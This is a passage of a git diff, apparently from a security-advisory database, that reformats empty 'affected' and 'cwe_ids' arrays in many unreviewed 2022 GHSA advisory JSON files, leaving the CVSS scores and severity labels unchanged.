@@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r2vg-x5gc-2wf3/GHSA-r2vg-x5gc-2wf3.json b/advisories/unreviewed/2022/05/GHSA-r2vg-x5gc-2wf3/GHSA-r2vg-x5gc-2wf3.json index 1f06744f11d..9a22ca6ad31 100644 --- a/advisories/unreviewed/2022/05/GHSA-r2vg-x5gc-2wf3/GHSA-r2vg-x5gc-2wf3.json +++ b/advisories/unreviewed/2022/05/GHSA-r2vg-x5gc-2wf3/GHSA-r2vg-x5gc-2wf3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r2w9-fmvc-cmrj/GHSA-r2w9-fmvc-cmrj.json b/advisories/unreviewed/2022/05/GHSA-r2w9-fmvc-cmrj/GHSA-r2w9-fmvc-cmrj.json index f547b5c6eac..8b461d3792a 100644 --- a/advisories/unreviewed/2022/05/GHSA-r2w9-fmvc-cmrj/GHSA-r2w9-fmvc-cmrj.json +++ b/advisories/unreviewed/2022/05/GHSA-r2w9-fmvc-cmrj/GHSA-r2w9-fmvc-cmrj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r3q4-wc3p-2gx3/GHSA-r3q4-wc3p-2gx3.json b/advisories/unreviewed/2022/05/GHSA-r3q4-wc3p-2gx3/GHSA-r3q4-wc3p-2gx3.json index 57090b2cf73..21f4a3e061c 100644 --- a/advisories/unreviewed/2022/05/GHSA-r3q4-wc3p-2gx3/GHSA-r3q4-wc3p-2gx3.json +++ b/advisories/unreviewed/2022/05/GHSA-r3q4-wc3p-2gx3/GHSA-r3q4-wc3p-2gx3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r4pp-q564-v5m8/GHSA-r4pp-q564-v5m8.json b/advisories/unreviewed/2022/05/GHSA-r4pp-q564-v5m8/GHSA-r4pp-q564-v5m8.json index 33b193abb1d..e8b31680d63 100644 --- a/advisories/unreviewed/2022/05/GHSA-r4pp-q564-v5m8/GHSA-r4pp-q564-v5m8.json +++ b/advisories/unreviewed/2022/05/GHSA-r4pp-q564-v5m8/GHSA-r4pp-q564-v5m8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r4vg-gjp9-3685/GHSA-r4vg-gjp9-3685.json b/advisories/unreviewed/2022/05/GHSA-r4vg-gjp9-3685/GHSA-r4vg-gjp9-3685.json index a05ffdc3263..a220b7e7a9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-r4vg-gjp9-3685/GHSA-r4vg-gjp9-3685.json +++ b/advisories/unreviewed/2022/05/GHSA-r4vg-gjp9-3685/GHSA-r4vg-gjp9-3685.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r52v-23cw-4rrh/GHSA-r52v-23cw-4rrh.json b/advisories/unreviewed/2022/05/GHSA-r52v-23cw-4rrh/GHSA-r52v-23cw-4rrh.json index 3c528039f1e..3586ddf2238 100644 --- a/advisories/unreviewed/2022/05/GHSA-r52v-23cw-4rrh/GHSA-r52v-23cw-4rrh.json +++ b/advisories/unreviewed/2022/05/GHSA-r52v-23cw-4rrh/GHSA-r52v-23cw-4rrh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r544-38gw-h4gw/GHSA-r544-38gw-h4gw.json b/advisories/unreviewed/2022/05/GHSA-r544-38gw-h4gw/GHSA-r544-38gw-h4gw.json index da5fa780ab9..e6658ae191f 100644 --- a/advisories/unreviewed/2022/05/GHSA-r544-38gw-h4gw/GHSA-r544-38gw-h4gw.json +++ b/advisories/unreviewed/2022/05/GHSA-r544-38gw-h4gw/GHSA-r544-38gw-h4gw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r5m4-gq2q-jh6g/GHSA-r5m4-gq2q-jh6g.json b/advisories/unreviewed/2022/05/GHSA-r5m4-gq2q-jh6g/GHSA-r5m4-gq2q-jh6g.json index 78f56fedc02..3bb8546a03d 100644 --- a/advisories/unreviewed/2022/05/GHSA-r5m4-gq2q-jh6g/GHSA-r5m4-gq2q-jh6g.json +++ b/advisories/unreviewed/2022/05/GHSA-r5m4-gq2q-jh6g/GHSA-r5m4-gq2q-jh6g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r69h-r767-prvr/GHSA-r69h-r767-prvr.json b/advisories/unreviewed/2022/05/GHSA-r69h-r767-prvr/GHSA-r69h-r767-prvr.json index f555c046270..4267fbf3789 100644 --- a/advisories/unreviewed/2022/05/GHSA-r69h-r767-prvr/GHSA-r69h-r767-prvr.json +++ b/advisories/unreviewed/2022/05/GHSA-r69h-r767-prvr/GHSA-r69h-r767-prvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r6x8-9r7j-gj2q/GHSA-r6x8-9r7j-gj2q.json b/advisories/unreviewed/2022/05/GHSA-r6x8-9r7j-gj2q/GHSA-r6x8-9r7j-gj2q.json index 55e98cf41fc..228170729c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-r6x8-9r7j-gj2q/GHSA-r6x8-9r7j-gj2q.json +++ b/advisories/unreviewed/2022/05/GHSA-r6x8-9r7j-gj2q/GHSA-r6x8-9r7j-gj2q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r7wc-wfj2-fvgg/GHSA-r7wc-wfj2-fvgg.json b/advisories/unreviewed/2022/05/GHSA-r7wc-wfj2-fvgg/GHSA-r7wc-wfj2-fvgg.json index 7e84c8f1f62..b94674bad68 100644 --- a/advisories/unreviewed/2022/05/GHSA-r7wc-wfj2-fvgg/GHSA-r7wc-wfj2-fvgg.json +++ b/advisories/unreviewed/2022/05/GHSA-r7wc-wfj2-fvgg/GHSA-r7wc-wfj2-fvgg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r83m-pg34-rh72/GHSA-r83m-pg34-rh72.json b/advisories/unreviewed/2022/05/GHSA-r83m-pg34-rh72/GHSA-r83m-pg34-rh72.json index 773e1883e03..f4733aee54c 100644 --- a/advisories/unreviewed/2022/05/GHSA-r83m-pg34-rh72/GHSA-r83m-pg34-rh72.json +++ b/advisories/unreviewed/2022/05/GHSA-r83m-pg34-rh72/GHSA-r83m-pg34-rh72.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r849-hjqv-324f/GHSA-r849-hjqv-324f.json b/advisories/unreviewed/2022/05/GHSA-r849-hjqv-324f/GHSA-r849-hjqv-324f.json index 135f80a9f3f..3868e29ed9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-r849-hjqv-324f/GHSA-r849-hjqv-324f.json +++ b/advisories/unreviewed/2022/05/GHSA-r849-hjqv-324f/GHSA-r849-hjqv-324f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rcg4-mfpx-vwc9/GHSA-rcg4-mfpx-vwc9.json b/advisories/unreviewed/2022/05/GHSA-rcg4-mfpx-vwc9/GHSA-rcg4-mfpx-vwc9.json index 450e1b0e67e..74095c4ece7 100644 --- a/advisories/unreviewed/2022/05/GHSA-rcg4-mfpx-vwc9/GHSA-rcg4-mfpx-vwc9.json +++ b/advisories/unreviewed/2022/05/GHSA-rcg4-mfpx-vwc9/GHSA-rcg4-mfpx-vwc9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rcr7-rpfc-4pw4/GHSA-rcr7-rpfc-4pw4.json b/advisories/unreviewed/2022/05/GHSA-rcr7-rpfc-4pw4/GHSA-rcr7-rpfc-4pw4.json index 077e552fedf..79861561115 100644 --- a/advisories/unreviewed/2022/05/GHSA-rcr7-rpfc-4pw4/GHSA-rcr7-rpfc-4pw4.json +++ b/advisories/unreviewed/2022/05/GHSA-rcr7-rpfc-4pw4/GHSA-rcr7-rpfc-4pw4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rf28-mvmh-8r4j/GHSA-rf28-mvmh-8r4j.json b/advisories/unreviewed/2022/05/GHSA-rf28-mvmh-8r4j/GHSA-rf28-mvmh-8r4j.json index f41f12ff14a..824841d4c0b 100644 --- a/advisories/unreviewed/2022/05/GHSA-rf28-mvmh-8r4j/GHSA-rf28-mvmh-8r4j.json +++ b/advisories/unreviewed/2022/05/GHSA-rf28-mvmh-8r4j/GHSA-rf28-mvmh-8r4j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rfxc-frqh-v8x9/GHSA-rfxc-frqh-v8x9.json b/advisories/unreviewed/2022/05/GHSA-rfxc-frqh-v8x9/GHSA-rfxc-frqh-v8x9.json index 53c0128182b..5635df5101f 100644 --- a/advisories/unreviewed/2022/05/GHSA-rfxc-frqh-v8x9/GHSA-rfxc-frqh-v8x9.json +++ b/advisories/unreviewed/2022/05/GHSA-rfxc-frqh-v8x9/GHSA-rfxc-frqh-v8x9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rg3w-c6h2-jc6h/GHSA-rg3w-c6h2-jc6h.json b/advisories/unreviewed/2022/05/GHSA-rg3w-c6h2-jc6h/GHSA-rg3w-c6h2-jc6h.json index fc28289e693..83a8a6562d5 100644 --- a/advisories/unreviewed/2022/05/GHSA-rg3w-c6h2-jc6h/GHSA-rg3w-c6h2-jc6h.json +++ b/advisories/unreviewed/2022/05/GHSA-rg3w-c6h2-jc6h/GHSA-rg3w-c6h2-jc6h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rg5m-35j5-v893/GHSA-rg5m-35j5-v893.json b/advisories/unreviewed/2022/05/GHSA-rg5m-35j5-v893/GHSA-rg5m-35j5-v893.json index c9abac396fb..3f95efa7f31 100644 --- a/advisories/unreviewed/2022/05/GHSA-rg5m-35j5-v893/GHSA-rg5m-35j5-v893.json +++ b/advisories/unreviewed/2022/05/GHSA-rg5m-35j5-v893/GHSA-rg5m-35j5-v893.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rgxg-7vf9-fg6x/GHSA-rgxg-7vf9-fg6x.json b/advisories/unreviewed/2022/05/GHSA-rgxg-7vf9-fg6x/GHSA-rgxg-7vf9-fg6x.json index 9a4a5b01e9c..12a4ae566e7 100644 --- a/advisories/unreviewed/2022/05/GHSA-rgxg-7vf9-fg6x/GHSA-rgxg-7vf9-fg6x.json +++ b/advisories/unreviewed/2022/05/GHSA-rgxg-7vf9-fg6x/GHSA-rgxg-7vf9-fg6x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rh6r-x58g-rprw/GHSA-rh6r-x58g-rprw.json b/advisories/unreviewed/2022/05/GHSA-rh6r-x58g-rprw/GHSA-rh6r-x58g-rprw.json index 217fd008ea0..576fe8fc674 100644 --- a/advisories/unreviewed/2022/05/GHSA-rh6r-x58g-rprw/GHSA-rh6r-x58g-rprw.json +++ b/advisories/unreviewed/2022/05/GHSA-rh6r-x58g-rprw/GHSA-rh6r-x58g-rprw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rh99-p3rq-cpj9/GHSA-rh99-p3rq-cpj9.json b/advisories/unreviewed/2022/05/GHSA-rh99-p3rq-cpj9/GHSA-rh99-p3rq-cpj9.json index 547183a7083..7ebc2f9ef15 100644 --- a/advisories/unreviewed/2022/05/GHSA-rh99-p3rq-cpj9/GHSA-rh99-p3rq-cpj9.json +++ b/advisories/unreviewed/2022/05/GHSA-rh99-p3rq-cpj9/GHSA-rh99-p3rq-cpj9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rm37-r67v-9m9w/GHSA-rm37-r67v-9m9w.json b/advisories/unreviewed/2022/05/GHSA-rm37-r67v-9m9w/GHSA-rm37-r67v-9m9w.json index a7ca48e3e7f..9832c0e4e60 100644 --- a/advisories/unreviewed/2022/05/GHSA-rm37-r67v-9m9w/GHSA-rm37-r67v-9m9w.json +++ b/advisories/unreviewed/2022/05/GHSA-rm37-r67v-9m9w/GHSA-rm37-r67v-9m9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rmrg-m3cv-mhfc/GHSA-rmrg-m3cv-mhfc.json b/advisories/unreviewed/2022/05/GHSA-rmrg-m3cv-mhfc/GHSA-rmrg-m3cv-mhfc.json index db248d62c86..909410a6084 100644 --- a/advisories/unreviewed/2022/05/GHSA-rmrg-m3cv-mhfc/GHSA-rmrg-m3cv-mhfc.json +++ b/advisories/unreviewed/2022/05/GHSA-rmrg-m3cv-mhfc/GHSA-rmrg-m3cv-mhfc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rq7c-3qxq-cq5m/GHSA-rq7c-3qxq-cq5m.json b/advisories/unreviewed/2022/05/GHSA-rq7c-3qxq-cq5m/GHSA-rq7c-3qxq-cq5m.json index 12ecc8879ee..ed4a0c03e37 100644 --- a/advisories/unreviewed/2022/05/GHSA-rq7c-3qxq-cq5m/GHSA-rq7c-3qxq-cq5m.json +++ b/advisories/unreviewed/2022/05/GHSA-rq7c-3qxq-cq5m/GHSA-rq7c-3qxq-cq5m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rqpp-j6vh-gmhm/GHSA-rqpp-j6vh-gmhm.json b/advisories/unreviewed/2022/05/GHSA-rqpp-j6vh-gmhm/GHSA-rqpp-j6vh-gmhm.json index dc76b7dce2e..3651b229f94 100644 --- a/advisories/unreviewed/2022/05/GHSA-rqpp-j6vh-gmhm/GHSA-rqpp-j6vh-gmhm.json +++ b/advisories/unreviewed/2022/05/GHSA-rqpp-j6vh-gmhm/GHSA-rqpp-j6vh-gmhm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rwxc-fr6w-9h93/GHSA-rwxc-fr6w-9h93.json b/advisories/unreviewed/2022/05/GHSA-rwxc-fr6w-9h93/GHSA-rwxc-fr6w-9h93.json index b33426af2af..c737b1c9b1d 100644 --- a/advisories/unreviewed/2022/05/GHSA-rwxc-fr6w-9h93/GHSA-rwxc-fr6w-9h93.json +++ b/advisories/unreviewed/2022/05/GHSA-rwxc-fr6w-9h93/GHSA-rwxc-fr6w-9h93.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rx2x-7mpr-c4c4/GHSA-rx2x-7mpr-c4c4.json b/advisories/unreviewed/2022/05/GHSA-rx2x-7mpr-c4c4/GHSA-rx2x-7mpr-c4c4.json index 870c1e18ce7..8ecaf408390 100644 --- a/advisories/unreviewed/2022/05/GHSA-rx2x-7mpr-c4c4/GHSA-rx2x-7mpr-c4c4.json +++ b/advisories/unreviewed/2022/05/GHSA-rx2x-7mpr-c4c4/GHSA-rx2x-7mpr-c4c4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rxf3-4jfr-8gr6/GHSA-rxf3-4jfr-8gr6.json b/advisories/unreviewed/2022/05/GHSA-rxf3-4jfr-8gr6/GHSA-rxf3-4jfr-8gr6.json index d19c12c193e..7050d9624ea 100644 --- a/advisories/unreviewed/2022/05/GHSA-rxf3-4jfr-8gr6/GHSA-rxf3-4jfr-8gr6.json +++ b/advisories/unreviewed/2022/05/GHSA-rxf3-4jfr-8gr6/GHSA-rxf3-4jfr-8gr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v3qj-j2r8-2677/GHSA-v3qj-j2r8-2677.json b/advisories/unreviewed/2022/05/GHSA-v3qj-j2r8-2677/GHSA-v3qj-j2r8-2677.json index 1cfb901bff3..b62763ba072 100644 --- a/advisories/unreviewed/2022/05/GHSA-v3qj-j2r8-2677/GHSA-v3qj-j2r8-2677.json +++ b/advisories/unreviewed/2022/05/GHSA-v3qj-j2r8-2677/GHSA-v3qj-j2r8-2677.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v44f-9mf2-7m36/GHSA-v44f-9mf2-7m36.json b/advisories/unreviewed/2022/05/GHSA-v44f-9mf2-7m36/GHSA-v44f-9mf2-7m36.json index bf823db964d..5d67ff881a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-v44f-9mf2-7m36/GHSA-v44f-9mf2-7m36.json +++ b/advisories/unreviewed/2022/05/GHSA-v44f-9mf2-7m36/GHSA-v44f-9mf2-7m36.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v459-3hhp-qpq4/GHSA-v459-3hhp-qpq4.json b/advisories/unreviewed/2022/05/GHSA-v459-3hhp-qpq4/GHSA-v459-3hhp-qpq4.json index ab7a45b814e..8f309b21d62 100644 --- a/advisories/unreviewed/2022/05/GHSA-v459-3hhp-qpq4/GHSA-v459-3hhp-qpq4.json +++ b/advisories/unreviewed/2022/05/GHSA-v459-3hhp-qpq4/GHSA-v459-3hhp-qpq4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v494-w68q-m3w5/GHSA-v494-w68q-m3w5.json b/advisories/unreviewed/2022/05/GHSA-v494-w68q-m3w5/GHSA-v494-w68q-m3w5.json index 4f055a46962..b2487f1d812 100644 --- a/advisories/unreviewed/2022/05/GHSA-v494-w68q-m3w5/GHSA-v494-w68q-m3w5.json +++ b/advisories/unreviewed/2022/05/GHSA-v494-w68q-m3w5/GHSA-v494-w68q-m3w5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v4g5-82wj-3j9w/GHSA-v4g5-82wj-3j9w.json b/advisories/unreviewed/2022/05/GHSA-v4g5-82wj-3j9w/GHSA-v4g5-82wj-3j9w.json index 6f07f566cc1..ea5580234af 100644 --- a/advisories/unreviewed/2022/05/GHSA-v4g5-82wj-3j9w/GHSA-v4g5-82wj-3j9w.json +++ b/advisories/unreviewed/2022/05/GHSA-v4g5-82wj-3j9w/GHSA-v4g5-82wj-3j9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v6c9-wm84-2385/GHSA-v6c9-wm84-2385.json b/advisories/unreviewed/2022/05/GHSA-v6c9-wm84-2385/GHSA-v6c9-wm84-2385.json index 806389b4b85..24f51d1dc05 100644 --- a/advisories/unreviewed/2022/05/GHSA-v6c9-wm84-2385/GHSA-v6c9-wm84-2385.json +++ b/advisories/unreviewed/2022/05/GHSA-v6c9-wm84-2385/GHSA-v6c9-wm84-2385.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v6xj-wfr9-vwrg/GHSA-v6xj-wfr9-vwrg.json b/advisories/unreviewed/2022/05/GHSA-v6xj-wfr9-vwrg/GHSA-v6xj-wfr9-vwrg.json index 7497aac7431..98b096e3c53 100644 --- a/advisories/unreviewed/2022/05/GHSA-v6xj-wfr9-vwrg/GHSA-v6xj-wfr9-vwrg.json +++ b/advisories/unreviewed/2022/05/GHSA-v6xj-wfr9-vwrg/GHSA-v6xj-wfr9-vwrg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff 